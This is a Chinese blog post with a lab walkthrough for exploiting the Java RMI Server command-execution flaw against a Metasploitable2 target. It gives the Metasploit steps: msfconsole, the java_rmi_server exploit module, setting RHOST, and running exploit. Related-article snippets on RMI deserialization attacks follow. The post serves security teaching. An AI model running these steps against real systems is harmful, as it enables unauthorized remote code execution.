Java RMI SERVER命令执行漏洞

已于 2024-05-12 22:35:36 修改
阅读量285 收藏 6
点赞数 3
分类专栏: Web安全进阶 文章标签: java 开发语言 rmi
于 2024-05-12 21:52:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138765270
版权

Java RMI SERVER命令执行漏洞

一、介绍

  • RMI全称是Remote Method Invocation(远程方法调用),是专为Java环境设计的远程方法调用机制,远程服务器提供API,客户端根据API提供相应参数即可调用远程方法
  • 由此可见,使用RMI时会涉及到参数传递和结果返回,参数为对象时,要求对象可以被序列化。目的是为了让两个隔离的java虚拟机,如虚拟机A能够调用到虚拟机B中的对象,而且这些虚拟机可以不存在于同一台主机上
  • RMI存在着三个主体:
    • RMI Registry
    • RMI Client
    • RMI Server
  • RMI中主要的api大致有:
    • java.rmi:提供客户端需要的类、接口和异常
    • java.rmi.server:提供服务端需要的类、接口和异常
    • java.rmi.registry:提供注册表的创建以及查找和命名远程对象的类、接口和异常

二、原理

  • Java RMI Server 的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行

三、复现准备

  1. 靶机:Metasplotable2-Linux - 192.168.9.147
  2. 攻击机:Kali - 192.168.9.148

四、漏洞复现

  1. 使用nmap扫描靶机的IP地址,可以看到靶机的1099端口开放
    在这里插入图片描述

  2. 启动metasploit

msfconsole

在这里插入图片描述

  1. 选择漏洞库
search rmi
use exploit/multi/misc/java_rmi_server

在这里插入图片描述
在这里插入图片描述

  1. 设置参数,

    • 查看需要设置的参数:show options
      在这里插入图片描述

    • 设置要攻击的机器IP:set RHOST 192.168.9.147
      在这里插入图片描述

  2. 开始攻击

exploit

在这里插入图片描述

  1. 利用成功
    在这里插入图片描述
月亮今天也很亮
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java代码审计之远程命令执行漏洞(REC)详解
悦分享
01-23 299
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。很多人喜欢把代码执行漏洞称为命令执行漏洞,因为命令执行漏洞可以执行系统命令,而代码执行漏洞也会执行系统命令,这样就容易混淆。
java-rmi-server.rar_Java RMI_rmi _服务器
09-23
java rmi远程调用服务器搭建,rmi具体实现步骤说明,
Java RMIServer和Client工程实例
01-13
Java RMIServer和Client工程实例
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Metasploitable2靶机之第九篇--Java RMI SERVER 命令执行漏洞
千寻的博客
04-03 1291
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
Java RMI 远程代码执行漏洞
LuckySec
11-30 3222
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
Java-RMI漏洞利用
最新发布
2301_76175665的博客
06-16 1476
Java远程方法调用,也就是Java RMI,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法。这与RPC基本相同,但是在面向对象的范例中,而非面向过程,它允许不在同一个地址空间中的Java程序互相通信。192.168.73.130是我们的靶机(metasploitable2),靶机上安装了Java RMI服务(rmiregistry),运行在1099端口上,你也可以通过nmap扫描结果来看这个端口是开放的。在我们的攻击机上使用MSF,搜索java_rmi
JAVA RMI 反序列化远程命令执行漏洞
热门推荐
LeeHDsniper的博客
05-11 2万+
JAVA RMI 反序列化远程命令执行漏洞 漏洞资料 背景 原理 Payload构造 搭建本地测试环境 开启包含第三方库的RMI服务 测试RMI客户端 攻击测试 升级版攻击 Weblogic Commons-Collections反序列化RCE漏洞CVE-2015-4852JAVA RMI 反序列化远程命令执行漏洞漏洞资料Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-324
Jmeter RMI 反序列化命令执行漏洞
m0_63241485的博客
08-26 815
ysoserial是一款在Github开源的知名java 反序列化利用工具,里面集合了各种java反序列化payload;由于其中部分payload使用到的低版本JDK中的类,所以建议使用低版本JDK .
java rmi远程方法调用漏洞,Java RMI(远程方法调用)示例程序
weixin_42505576的博客
03-10 318
Java RMI(远程方法调用)示例程序Java RMI(远程方法调用)示例程序1. 编写接口import java.rmi.*;public interface HelloIn extends java.rmi.Remote{String sayHello() throws RemoteException;}2. 实现远程接口import java.rmi.*;import java.net.*...
java RMI客户端调用远程服务器系统命令
04-06
NULL 博文链接:https://skyandcity.iteye.com/blog/1547028
Java RMI远程方法调用详解-例子代码
07-22
Java RMI远程方法调用详解-例子代码,例子详解在:http://blog.csdn.net/guyuealian/article/details/51992182
java_rmi漏洞利用工具
05-31
本项目使用socket直接发送数据包来攻击rmi,通过反序列化攻击rmi,双击直接运行,对1099端口的rmi服务直接进行漏洞检测。
Metasploit溢出java RMI SERVER命令执行漏洞
weixin_33924312的博客
12-10 1091
利用java RMI SERVER命令执行漏洞,获得目标主机root权限。Java RMI ServerRMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168...
rmi远程代码执行漏洞_Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241 )...
weixin_30914893的博客
12-31 757
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载本打算慢慢写出来的,但前几天发现国外有研究员发了一篇关于这个CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle认为是同一个漏洞然后合并了CVE,还是说我找错了CVE。总之,先简单描述一下漏...
5-java安全基础——RMI和JNDI实现漏洞利用
网络安全
07-14 3551
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。 关于什么是标识符?可参考RMI注册表,例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远
Java代码审计之命令执行漏洞
悦分享
08-02 850
执行了ls&&结果报错,看显示结果发现过滤了&&,然后把&转编码发现还是会报错,但是从服务端代码来看并没有做参数的过滤。从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。进行代码审计时遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。...
远程代码执行漏洞的利用与防御
qq_61714717的博客
12-14 1410
RCE漏洞
java rmi漏洞利用如何执行远程代码
03-05
对于这个问题,我可以回答:Java RMI漏洞利用可以通过构造恶意的RMI请求来执行远程代码。攻击者可以利用这个漏洞来获取系统权限、窃取敏感信息等。为了防止这种漏洞的利用,建议及时更新Java版本,或者禁用Java RMI服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值